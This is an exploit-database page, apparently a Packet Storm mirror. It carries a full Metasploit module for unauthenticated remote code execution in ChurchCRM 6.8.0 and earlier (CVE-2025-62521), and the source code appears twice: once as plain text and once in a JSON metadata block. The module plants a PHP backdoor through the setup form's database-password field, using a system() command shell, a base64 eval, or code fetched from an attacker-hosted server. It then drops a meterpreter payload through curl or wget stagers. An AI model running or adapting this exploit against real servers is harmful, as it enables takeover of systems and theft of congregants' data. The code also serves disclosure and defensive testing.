📄 ChurchCRM 6.8.0 Unauthenticated Remote Code Execution_PACKETSTORM:215704

10 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Description

This Metasploit module exploits an unauthenticated remote code execution vulnerability in the installation process of ChurchCRM versions 6.8.0 and earlier. By sending a specially crafted POST request to the setup page, an attacker can execute arbitrary...

Visit Original Source

Basic Information

ID PACKETSTORM:215704

Published Feb 16, 2026 at 00:00

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpServer

def initialize(info = {})
super(
update_info(
info,
'Name' => 'ChurchCRM Unauthenticated RCE 6.8.0',
'Description' => %q{
This module exploits an unauthenticated remote code execution
vulnerability in the installation process of ChurchCRM versions
6.8.0 and earlier. By sending a specially crafted POST request to
the 'setup' page, an attacker can execute arbitrary commands on the
target server. This module uploads a meterpreter payload to the
target server and executes it, allowing for remote code execution.
},
'License' => MSF_LICENSE,
'Author' => ['LucasCsmt'],
'References' => [
[ 'GHSA', 'm8jq-j3p9-2xf3'],
[ 'CVE', '2025-62521']
],
'Platform' => ['linux', 'php'],
'Targets' => [
[
'Linux/unix Command (CmdStager)',
{
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Platform' => ['linux'],
'Type' => :nix_cmdstager,
'DefaultOptions' => {
'InitialAutoRunScript' => 'post/multi/general/execute COMMAND="rm Include/Config.php"'
},
'CmdStagerFlavor' => [
'printf', 'echo', 'bourne', 'fetch', 'curl', 'wget'
]
}
],
[
'PHP (In-Memory)',
{
'Arch' => [ ARCH_PHP ],
'Platform' => ['php'],
'Type' => :php_memory,
'DefaultOptions' => {
'InitialAutoRunScript' => 'post/multi/general/execute COMMAND="php -r \"unlink(\'Include/Config.php\');\""'
}
}
],
[
'PHP (fetch)',
{
'Arch' => [ ARCH_PHP ],
'Platform' => ['php'],
'Type' => :php_fetch,
'DefaultOptions' => {
'InitialAutoRunScript' => 'post/multi/general/execute COMMAND="php -r \"unlink(\'Include/Config.php\');\""'
}
}
],
],
'DisclosureDate' => '2025-12-17',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
}
)
)

register_options(
[
OptString.new('TARGETURI', [true, 'Base path', '/']),
]
)
end

# Check if the target is up by accessing the setup page
def check
print_status('Checking if the target is reachable...')

res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'setup', '/')
})

unless res && (res.code == 301 || res.code == 200 || res.code == 302)
fail_with(Failure::Unreachable, 'Target is not reachable')
return Exploit::CheckCode::Unknown('Target setup page is inaccessible')
end

version = res.headers['CRM-VERSION']
if version
print_status("Found ChurchCRM version: #{version}")
if Rex::Version.new(version) <= Rex::Version.new('6.8.0')
return Exploit::CheckCode::Appears("Vulnerable version #{version} detected via CRM-VERSION header.")
else
return Exploit::CheckCode::Safe("Version #{version} is not vulnerable.")
end
end

return Exploit::CheckCode::Appears
end

# Build the payload that will be into the installation form
#
# @return : the payload
def build_payload
case target['Type']
when :php_memory
b64_payload = Rex::Text.encode_base64(payload.encoded)
"#{rand_text_alpha(3)}'; eval(base64_decode(\"#{b64_payload}\")); //"
when :php_fetch
start_service
payload_name = '/tmp/' + rand_text_alpha(5..10) + '.php'
"#{rand_text_alpha(3)}'; $f='#{payload_name}'; file_put_contents($f, file_get_contents('#{get_uri}')); register_shutdown_function('unlink', $f); include($f); //"
else
"#{rand_text_alpha(3)}'; system($_GET['cmd']); //"
end
end

# Send a POST request to the setup page in order to execute commands
def alter_config
print_status('Injecting backdoor into Include/Config.php via setup page...')

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'setup', '/'),
'vars_post' => {
'DB_SERVER_NAME' => rand_text_alpha(5..10),
'DB_SERVER_PORT' => '3306',
'DB_NAME' => rand_text_alpha(5..10),
'DB_USER' => rand_text_alpha(5..8),
'DB_PASSWORD' => build_payload,
'ROOT_PATH' => '/',
'URL' => "http://#{rand_text_alpha(5..10)}.com/"
}
})

msg = 'Failed to inject backdoor into Include/Config.php. ' \
'This can happen if the setup process has already been ' \
'completed or if the target is not vulnerable.'
fail_with(Failure::UnexpectedReply, msg) unless res&.code == 200
end

# Execute command on the target server
#
# @param cmd [String] the command to execute
def execute_command(cmd, _opts = {})
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'vars_get' => { 'cmd' => cmd }
})
end

# Execute PHP code on the target server in order to run the payload
def execute_php
print_status('Trying to execute the PHP payload')

send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})

print_good('PHP payload successfully executed')
end

# Upload the payload to the target server
def execute_linux
print_status('Uploading payload to the target server...')

execute_cmdstager(
linemax: 500,
nodelete: false,
background: true,
temp: '/tmp'
)

print_good('Payload uploaded successfully.')
end

# Handles the incoming HTTP request and serves the payload to the target.
def on_request_uri(cli, _request)
p = payload.encoded
send_response(cli, p, {
'Content-Type' => 'application/x-httpd-php',
'Pragma' => 'no-cache'
})
end

def exploit
alter_config

case target['Type']
when :nix_cmdstager
execute_linux
else
execute_php
end
end
end

{
    "lastseen": "2026-02-16T18:13:35",
    "description": "This Metasploit module exploits an unauthenticated remote code execution vulnerability in the installation process of ChurchCRM versions 6.8.0 and earlier. By sending a specially crafted POST request to the setup page, an attacker can execute arbitrary...",
    "published": "2026-02-16T00:00:00",
    "modified": "2026-02-16T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 ChurchCRM 6.8.0 Unauthenticated Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215704",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-62521"
    ],
    "sourceData": "##\n    # This module requires Metasploit: https://metasploit.com/download\n    # Current source: https://github.com/rapid7/metasploit-framework\n    ##\n    \n    class MetasploitModule < Msf::Exploit::Remote\n      Rank = NormalRanking\n    \n      include Msf::Exploit::Remote::HttpClient\n      include Msf::Exploit::CmdStager\n      include Msf::Exploit::Remote::HttpServer\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name' => 'ChurchCRM Unauthenticated RCE 6.8.0',\n            'Description' => %q{\n              This module exploits an unauthenticated remote code execution\n              vulnerability in the installation process of ChurchCRM versions\n              6.8.0 and earlier. By sending a specially crafted POST request to\n              the 'setup' page, an attacker can execute arbitrary commands on the\n              target server. This module uploads a meterpreter payload to the\n              target server and executes it, allowing for remote code execution.\n            },\n            'License' => MSF_LICENSE,\n            'Author' => ['LucasCsmt'],\n            'References' => [\n              [ 'GHSA', 'm8jq-j3p9-2xf3'],\n              [ 'CVE', '2025-62521']\n            ],\n            'Platform' => ['linux', 'php'],\n            'Targets' => [\n              [\n                'Linux/unix Command (CmdStager)',\n                {\n                  'Arch' => [ ARCH_X86, ARCH_X64 ],\n                  'Platform' => ['linux'],\n                  'Type' => :nix_cmdstager,\n                  'DefaultOptions' => {\n                    'InitialAutoRunScript' => 'post/multi/general/execute COMMAND=\"rm Include/Config.php\"'\n                  },\n                  'CmdStagerFlavor' => [\n                    'printf', 'echo', 'bourne', 'fetch', 'curl', 'wget'\n                  ]\n                }\n              ],\n              [\n                'PHP (In-Memory)',\n                {\n                  'Arch' => [ ARCH_PHP ],\n                  'Platform' => ['php'],\n                  'Type' => :php_memory,\n                  'DefaultOptions' => {\n                    'InitialAutoRunScript' => 'post/multi/general/execute COMMAND=\"php -r \\\"unlink(\\'Include/Config.php\\');\\\"\"'\n                  }\n                }\n              ],\n              [\n                'PHP (fetch)',\n                {\n                  'Arch' => [ ARCH_PHP ],\n                  'Platform' => ['php'],\n                  'Type' => :php_fetch,\n                  'DefaultOptions' => {\n                    'InitialAutoRunScript' => 'post/multi/general/execute COMMAND=\"php -r \\\"unlink(\\'Include/Config.php\\');\\\"\"'\n                  }\n                }\n              ],\n            ],\n            'DisclosureDate' => '2025-12-17',\n            'DefaultTarget' => 0,\n            'Notes' => {\n              'Stability' => [CRASH_SAFE],\n              'Reliability' => [REPEATABLE_SESSION],\n              'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]\n            }\n          )\n        )\n    \n        register_options(\n          [\n            OptString.new('TARGETURI', [true, 'Base path', '/']),\n          ]\n        )\n      end\n    \n      # Check if the target is up by accessing the setup page\n      def check\n        print_status('Checking if the target is reachable...')\n    \n        res = send_request_cgi({\n          'method' => 'GET',\n          'uri' => normalize_uri(target_uri.path, 'setup', '/')\n        })\n    \n        unless res && (res.code == 301 || res.code == 200 || res.code == 302)\n          fail_with(Failure::Unreachable, 'Target is not reachable')\n          return Exploit::CheckCode::Unknown('Target setup page is inaccessible')\n        end\n    \n        version = res.headers['CRM-VERSION']\n        if version\n          print_status(\"Found ChurchCRM version: #{version}\")\n          if Rex::Version.new(version) <= Rex::Version.new('6.8.0')\n            return Exploit::CheckCode::Appears(\"Vulnerable version #{version} detected via CRM-VERSION header.\")\n          else\n            return Exploit::CheckCode::Safe(\"Version #{version} is not vulnerable.\")\n          end\n        end\n    \n        return Exploit::CheckCode::Appears\n      end\n    \n      # Build the payload that will be into the installation form\n      #\n      # @return : the payload\n      def build_payload\n        case target['Type']\n        when :php_memory\n          b64_payload = Rex::Text.encode_base64(payload.encoded)\n          \"#{rand_text_alpha(3)}'; eval(base64_decode(\\\"#{b64_payload}\\\")); //\"\n        when :php_fetch\n          start_service\n          payload_name = '/tmp/' + rand_text_alpha(5..10) + '.php'\n          \"#{rand_text_alpha(3)}'; $f='#{payload_name}'; file_put_contents($f, file_get_contents('#{get_uri}')); register_shutdown_function('unlink', $f); include($f); //\"\n        else\n          \"#{rand_text_alpha(3)}'; system($_GET['cmd']); //\"\n        end\n      end\n    \n      # Send a POST request to the setup page in order to execute commands\n      def alter_config\n        print_status('Injecting backdoor into Include/Config.php via setup page...')\n    \n        res = send_request_cgi({\n          'method' => 'POST',\n          'uri' => normalize_uri(target_uri.path, 'setup', '/'),\n          'vars_post' => {\n            'DB_SERVER_NAME' => rand_text_alpha(5..10),\n            'DB_SERVER_PORT' => '3306',\n            'DB_NAME' => rand_text_alpha(5..10),\n            'DB_USER' => rand_text_alpha(5..8),\n            'DB_PASSWORD' => build_payload,\n            'ROOT_PATH' => '/',\n            'URL' => \"http://#{rand_text_alpha(5..10)}.com/\"\n          }\n        })\n    \n        msg = 'Failed to inject backdoor into Include/Config.php. ' \\\n          'This can happen if the setup process has already been ' \\\n          'completed or if the target is not vulnerable.'\n        fail_with(Failure::UnexpectedReply, msg) unless res&.code == 200\n      end\n    \n      # Execute command on the target server\n      #\n      # @param cmd [String] the command to execute\n      def execute_command(cmd, _opts = {})\n        send_request_cgi({\n          'method' => 'GET',\n          'uri' => normalize_uri(target_uri.path),\n          'vars_get' => { 'cmd' => cmd }\n        })\n      end\n    \n      # Execute PHP code on the target server in order to run the payload\n      def execute_php\n        print_status('Trying to execute the PHP payload')\n    \n        send_request_cgi({\n          'method' => 'GET',\n          'uri' => normalize_uri(target_uri.path)\n        })\n    \n        print_good('PHP payload successfully executed')\n      end\n    \n      # Upload the payload to the target server\n      def execute_linux\n        print_status('Uploading payload to the target server...')\n    \n        execute_cmdstager(\n          linemax: 500,\n          nodelete: false,\n          background: true,\n          temp: '/tmp'\n        )\n    \n        print_good('Payload uploaded successfully.')\n      end\n    \n      # Handles the incoming HTTP request and serves the payload to the target.\n      def on_request_uri(cli, _request)\n        p = payload.encoded\n        send_response(cli, p, {\n          'Content-Type' => 'application/x-httpd-php',\n          'Pragma' => 'no-cache'\n        })\n      end\n    \n      def exploit\n        alter_config\n    \n        case target['Type']\n        when :nix_cmdstager\n          execute_linux\n        else\n          execute_php\n        end\n      end\n    end",
    "sourceHref": "https://packetstorm.news/download/215704",
    "cvss": {
        "score": 10,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215704/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply